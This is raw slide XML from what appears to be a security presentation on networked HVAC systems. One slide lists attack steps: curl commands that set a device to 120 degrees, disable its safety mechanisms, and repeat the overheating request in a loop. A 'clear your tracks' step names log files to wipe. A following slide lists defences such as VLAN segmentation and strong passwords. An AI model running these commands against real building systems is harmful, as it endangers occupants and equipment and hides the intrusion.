          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>curl -X POST -d "temp=120" http://192.168.0.10/api/setTemp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="2687836"/>
            <a:ext cx="324445" cy="324445"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2818"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8ECE4"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="151617"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="bl" rotWithShape="0" blurRad="0" dist="12700" dir="2700000">
              <a:srgbClr val="151617">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558820" y="2714804"/>
            <a:ext cx="216337" cy="270391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="2737366"/>
            <a:ext cx="2735342" cy="225266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Disable Safety Mechanisms:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="3124795"/>
            <a:ext cx="7665720" cy="447080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2045"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966311" y="3124795"/>
            <a:ext cx="7680008" cy="447080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4840"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110496" y="3232904"/>
            <a:ext cx="7391638" cy="230862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>curl -X POST -d "safety=false" http://192.168.0.10/api/config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="3860363"/>
            <a:ext cx="324445" cy="324445"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2818"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8ECE4"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="151617"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="bl" rotWithShape="0" blurRad="0" dist="12700" dir="2700000">
              <a:srgbClr val="151617">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558820" y="3887331"/>
            <a:ext cx="216337" cy="270391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="3909893"/>
            <a:ext cx="2918103" cy="225266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Automate Continuous Attack:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="4297323"/>
            <a:ext cx="7665720" cy="1139666"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 802"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966311" y="4297323"/>
            <a:ext cx="7680008" cy="1139666"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1899"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBDFD7"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110496" y="4405432"/>
            <a:ext cx="7391638" cy="923449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EBDFD7"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>while true; do  curl -X POST -d "temp=110" http://192.168.0.10/api/setTemp  sleep 5done</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504825" y="5725477"/>
            <a:ext cx="324445" cy="324445"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2818"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8ECE4"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="151617"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="bl" rotWithShape="0" blurRad="0" dist="12700" dir="2700000">
              <a:srgbClr val="151617">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558820" y="5752445"/>
            <a:ext cx="216337" cy="270391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="5775008"/>
            <a:ext cx="1803083" cy="225266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Clear your tracks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="6086713"/>
            <a:ext cx="7665720" cy="230862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Check common filepaths for log files </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="6404015"/>
            <a:ext cx="7665720" cy="230862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>(will vary depending on the system) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="6721316"/>
            <a:ext cx="7665720" cy="230862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Common directories include</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="7038618"/>
            <a:ext cx="7665720"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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>/var/log/hvac_access.log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="7319963"/>
            <a:ext cx="7665720"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151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>/var/log/auth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="7601307"/>
            <a:ext cx="7665720" cy="230862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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94373" y="547211"/>
            <a:ext cx="10980658" cy="619958"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="151617"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat Black" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat Black" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Defending Your Climate Control Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="694373" y="1563886"/>
            <a:ext cx="991910" cy="1529596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="1762244"/>
            <a:ext cx="2485668" cy="309920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"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1. Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="2191107"/>
            <a:ext cx="12051387"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51617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Segment IoT devices into separate VLANs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="2577822"/>
            <a:ext cx="12051387"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51617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Block unnecessary ports and protocols with firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 1" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="694373" y="3093482"/>
            <a:ext cx="991910" cy="1529596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="3291840"/>
            <a:ext cx="2479953" cy="309920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"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2. Access Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="3720703"/>
            <a:ext cx="12051387"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51617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
                <a:ea typeface="Inconsolata" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Inconsolata" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Enforce strong, unique passwords for all devices.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884640" y="4107418"/>
            <a:ext cx="12051387"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51617"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata" pitchFamily="34" charset="0"/>
